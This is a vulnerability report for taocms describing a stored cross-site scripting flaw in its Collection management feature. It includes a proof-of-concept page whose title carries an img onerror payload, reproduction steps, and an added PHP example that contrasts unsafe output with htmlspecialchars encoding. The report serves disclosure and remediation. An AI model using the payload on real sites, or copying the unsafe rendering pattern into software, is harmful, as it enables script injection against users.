taocms
There is a stored cross-site scripting (XSS) vulnerability in “Collection management” (column administrator authority).
First, construct our POC and put it on our website; the URL is http://test.com/id-1502.html. The POC is as follows:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8">
<title> Test title <img src=x onerror=alert(6)> </title>
</head>
<body>
<span class="smalltxt">
Testcontent-1
</span>
<div id="digit">
Testcontent-2
</div>
</body>
</html>
Then log in to the management backend as an administrator, click Collection Management, enter the address of the POC we constructed, and click Start Collection:
When the page we constructed is collected, you can see the POC trigger:
The POC also triggers on the homepage of the website:
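The mitigation for the behaviour reported above, shown as an added PHP example that is not taocms code and not part of the original report: the title taken from a collected page is untrusted text and has to be HTML-encoded wherever it is written into a page. The function names and the `<h2>` wrapper are hypothetical, and the sample input is constructed from the POC in this report.

```php
<?php
// Added example, not taocms code. All function names are hypothetical.

// Constructed sample: the POC page as a collector would receive it.
$fetched = <<<'HTML'
<html><head><meta charset="utf-8">
<title> Test title <img src=x onerror=alert(6)> </title>
</head><body><div id="digit">Testcontent-2</div></body></html>
HTML;

/** Extract the raw <title> contents from collected HTML (untrusted input). */
function collect_title(string $html): string
{
    if (preg_match('~<title[^>]*>(.*?)</title>~is', $html, $m) !== 1) {
        return '';
    }
    return trim($m[1]);
}

/** Vulnerable pattern: the collected string is concatenated into markup as-is. */
function render_title_unsafe(string $title): string
{
    return '<h2>' . $title . '</h2>';
}

/** Hardened pattern: encode on output so the browser treats the title as text. */
function render_title_safe(string $title): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5;
    return '<h2>' . htmlspecialchars($title, $flags, 'UTF-8') . '</h2>';
}

$title = collect_title($fetched);

// The <img> element from the remote page reaches the browser as live markup.
echo render_title_unsafe($title), PHP_EOL;

// The same string with <, >, quotes and & encoded: displayed, never parsed as a tag.
echo render_title_safe($title), PHP_EOL;
```

The encoding has to be applied at every place the stored title is rendered, which in this report means both the collection result page in the backend and the site homepage.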